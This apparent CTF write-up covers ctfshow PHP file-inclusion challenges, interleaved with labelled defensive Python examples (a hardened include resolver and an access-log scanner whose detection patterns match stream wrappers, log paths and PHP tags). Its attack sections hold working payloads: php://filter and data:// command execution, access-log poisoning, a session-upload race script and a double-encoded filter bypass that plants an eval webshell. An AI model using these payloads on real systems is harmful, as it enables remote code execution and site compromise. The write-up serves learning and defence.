ctfshow file inclusion

web78

Nothing special to say here: the php://filter wrapper reads the source base64-encoded.

payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php

web79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}


Look at the source first. The previous payload no longer works because the string php is replaced, so we switch methods. Reference article: https://www.freebuf.com/column/148886.html
The payload below is the one it uses.

payload: ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

That executes, so next we run a command through it.
One pitfall here: the PHP tag must not be closed. The encoded source is <?php system('cat flag.php');

payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
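The checks in web79, web80 and web88 all share the same flaw: they blacklist substrings (php, data, a list of punctuation) in a value that is then handed straight to include(). The following is an added example, not code from the writeup or from ctfshow: it models the web79 check in Python next to a hardened resolver that decodes the parameter fully, refuses any stream wrapper or absolute path, and requires the result to be a .php file inside an assumed document root (WEB_ROOT is a constructed value). Run it and compare what each check does with the writeup's own payloads.

```python
import os
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # constructed document root for this example


def weak_filter(file: str) -> str:
    """Model of the web79 check: blank out the literal 'php' and include whatever is left.
    A value that never contains that substring, such as data://..., passes through untouched."""
    return file.replace("php", "???")


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing (bounded), so a single- or double-encoded
    scheme cannot slip past the checks that follow."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_include(file: str) -> Optional[str]:
    """Hardened counterpart: return an absolute path under WEB_ROOT, or None to refuse.
    Instead of blacklisting substrings, normalise the input and then require it to be a
    plain relative .php name that resolves inside the document root."""
    name = fully_decode(file)
    if "\x00" in name or ":" in name:        # no stream wrappers (php://, data://, zip://, ...)
        return None
    if name.startswith(("/", "\\")):         # no absolute paths such as /var/log/nginx/access.log
        return None
    path = os.path.normpath(os.path.join(WEB_ROOT, name))
    if os.path.commonpath([WEB_ROOT, path]) != WEB_ROOT:   # no ../ escape from the root
        return None
    if not path.endswith(".php"):            # only PHP sources, never logs or session files
        return None
    return path


if __name__ == "__main__":
    for candidate in ("about.php",
                      "php://filter/read=convert.base64-encode/resource=flag.php",
                      "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=",
                      "../../etc/passwd",
                      "%2570hp://filter/write=convert.base64-decode/resource=1.php"):
        print(f"{candidate!r:70} weak -> {weak_filter(candidate)!r:45} hardened -> {resolve_include(candidate)}")
```

The weak filter leaves the data:// value untouched and only mangles the php:// one, while the hardened resolver accepts nothing but about.php. In real code an explicit allowlist of page names is simpler still; the path-based version is shown because it also explains why the double-encoded value from web87 must be decoded before any check is applied.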

web80

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

Reference article: local file inclusion.

Log file getshell: capture the request and change the User-Agent, then connect with AntSword.

The data protocol can no longer be used with include, so open_basedir has to be bypassed.

Reference link: "php pseudo-protocols: seven ways to achieve command execution".

Log path: /var/log/nginx/access.log

web81

Same as web80: include the log file.
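Every technique in web78 through web86 leaves a trace in exactly the file that web80 and web81 abuse: the web server access log. The following is an added example, not part of the writeup: a small Python scanner over constructed nginx access.log lines (the sample lines are made up for this example, not from any real server) that flags a stream wrapper or a log/session path in the file parameter, decodes the parameter repeatedly so a double-encoded scheme is still seen, and flags a PHP open tag in the User-Agent or Referer header, which is what log poisoning looks like before the log is ever included.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed nginx access.log lines in the default "combined" format: one benign request,
# then requests shaped like the techniques in this writeup. Not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2021:12:00:01 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2021:12:00:02 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 900 "-" "curl/7.68.0"
10.0.0.9 - - [10/Mar/2021:12:00:03 +0000] "GET /index.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= HTTP/1.1" 200 77 "-" "curl/7.68.0"
10.0.0.9 - - [10/Mar/2021:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 77 "-" "<?php echo 'poisoned'; ?>"
10.0.0.9 - - [10/Mar/2021:12:00:05 +0000] "GET /index.php?file=/var/log/nginx/access.log HTTP/1.1" 200 4096 "-" "curl/7.68.0"
10.0.0.9 - - [10/Mar/2021:12:00:06 +0000] "GET /index.php?file=/tmp/sess_flag HTTP/1.1" 200 40 "-" "curl/7.68.0"
10.0.0.9 - - [10/Mar/2021:12:00:07 +0000] "GET /index.php?file=%2570hp://filter/write=convert.base64-decode/resource=1.php HTTP/1.1" 200 10 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?:\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)          # php:, data:, zip:, phar:, ...
SENSITIVE_PATH_RE = re.compile(r'^/(?:var/log/|tmp/sess_|proc/self/)')
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.I)                # PHP open tag inside a header


def fully_decode(value, rounds=3):
    """URL-decode until stable (bounded) so %2570hp... is recognised as php..."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def file_params(target):
    """Raw values of the `file` query parameter, split by hand so that the ';' inside a
    data: URL is kept (parse_qs on older Pythons would split on it)."""
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "file":
            yield value


def inspect_line(line):
    """Return (ip, time, reason) tuples for one log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    for raw in file_params(m["target"]):
        value = fully_decode(raw)
        if SCHEME_RE.match(value):
            reasons.append("stream wrapper in file parameter: " + value.split("/")[0])
        elif SENSITIVE_PATH_RE.match(value):
            reasons.append("log/session file requested via file parameter: " + value)
    for header in ("referer", "ua"):
        if PHP_TAG_RE.search(m[header]):
            reasons.append(f"PHP open tag in {header} header (log poisoning attempt)")
    return [(m["ip"], m["time"], r) for r in reasons]


def scan_log(text):
    """Scan a whole log and collect every finding."""
    return [hit for line in text.splitlines() if line.strip() for hit in inspect_line(line)]


if __name__ == "__main__":
    for ip, when, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} [{when}] {reason}")
```

On the sample the benign request produces nothing and the other six lines each produce one finding. The poisoning line is the one to act on first: once a PHP tag is in the log, every later request that includes the log executes it, so the detection belongs on the write, not only on the read.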

web82 to web86

Go straight to the script.

import io
import requests
import threading

sessID = 'flag'
url = 'http://296b5d26-334c-4459-b7a6-b16db5aad264.challenge.ctf.show:8080/'

# 1. Set the signal.
# Event.set() sets the Event object's internal flag to true. Event provides is_set() to
# query that flag; once set() has been called, is_set() returns true.
event = threading.Event()   # shared stop signal, defined at module level so both workers see it


def write(session):
    # Keep uploading while the flag is set: each upload carries PHP_SESSION_UPLOAD_PROGRESS,
    # so PHP writes /tmp/sess_<sessID> with the posted value for the duration of the upload.
    while event.is_set():
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            url,
            cookies={'PHPSESSID': sessID},
            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat *.php");?>'},
            files={'file': ('test.txt', f)}
        )


def read(session):
    # Race the cleanup: keep including the session file until a response shows it was picked up
    # ('test' is the uploaded file name, which appears in the session data).
    while event.is_set():
        response = session.get(url + '?file=/tmp/sess_{}'.format(sessID))
        if 'test' in response.text:
            print(response.text)
            event.clear()   # tell every worker thread to stop
        else:
            print('[*]retrying...')


if __name__ == '__main__':
    event.set()
    with requests.Session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()

web87

Reference link: various ways to bypass die().

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
    highlight_file(__FILE__);
}

It can be bypassed with base64. The decode filter drops every character outside the base64 alphabet, so the prefix leaves only phpdie, which happens to be exactly 6 bytes; adding 2 more makes a multiple of 4, so the rest of the stream base64-decodes cleanly.
Construct
php://filter/write=convert.base64-decode/resource=1.php
and URL-encode it twice (the code calls urldecode() on a GET value PHP has already decoded once, so a double-encoded value passes the str_replace filters still encoded).

payload
file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

content=aaPD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==
Reference on the uses of php://filter: "Talking about the magic of php://filter".
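The byte-count reasoning above is worth seeing run, because it is the whole reason a die() prefix written by the server is no defence once the attacker controls the filter chain on the destination. The following is an added example, not from the writeup: a Python model of a lenient base64 decode filter (non-alphabet characters dropped, complete 4-character groups decoded, a trailing partial group ignored) applied to the challenge's own prefix followed by a constructed, harmless payload, base64("hello world!"). With no padding the guard's 6 surviving characters shift every later group boundary and the content comes out as garbage; with 2 padding characters the guard decodes to 6 junk bytes and the content lands intact.

```python
import re

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# The prefix the challenge writes in front of every file (taken from the web87 source).
GUARD = "<?php die('大佬别秀了');?>"
# Constructed benign payload for the example: base64("hello world!"), 16 characters.
CONTENT_B64 = "aGVsbG8gd29ybGQh"


def alphabet_chars(s: str) -> str:
    """Characters a lenient base64 decoder keeps; punctuation, spaces, multibyte text
    and '=' padding are all dropped."""
    return re.sub(r"[^A-Za-z0-9+/]", "", s)


def lenient_b64_decode(s: str) -> bytes:
    """Model of a lenient streaming base64 decoder: keep alphabet characters only,
    decode each complete 4-character group into 3 bytes, ignore a trailing partial group."""
    chars = alphabet_chars(s)
    out = bytearray()
    for i in range(0, len(chars) - len(chars) % 4, 4):
        n = 0
        for c in chars[i:i + 4]:
            n = (n << 6) | B64_ALPHABET.index(c)
        out += n.to_bytes(3, "big")
    return bytes(out)


def written_file(pad: str) -> bytes:
    """What ends up on disk when GUARD + pad + CONTENT_B64 passes through the decode filter."""
    return lenient_b64_decode(GUARD + pad + CONTENT_B64)


def content_survives(pad: str) -> bool:
    """True when the decoded file still ends with the intended content, i.e. the guard
    did not disturb the 4-character alignment of everything after it."""
    return written_file(pad).endswith(b"hello world!")


if __name__ == "__main__":
    print("guard keeps only:", alphabet_chars(GUARD))          # phpdie, 6 characters
    for pad in ("", "a", "aa"):
        print(f"pad={pad!r:5} -> {written_file(pad)!r}  intact={content_survives(pad)}")
```

The defensive takeaway is that nothing prepended by the server can be relied on when file_put_contents() is given a php://filter destination; the fix is to refuse wrappers in the target path (or resolve it against an allowlist) rather than to tune the prefix.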

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

1. The dot is filtered, so the file pseudo-protocol cannot be used.
2. php is filtered, so the php:// protocol cannot be used.
3. The absolute path is unknown, so the zip:// & bzip2:// & zlib:// protocols cannot be used.
4. Not filtered, so the data:// protocol can be used.

payload (remember to delete the = sign, because it is filtered):

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTsgPz4
The reference article uses the data pseudo-protocol to bypass filtering of parentheses and backticks.


Origin blog.csdn.net/qq_45951598/article/details/115058013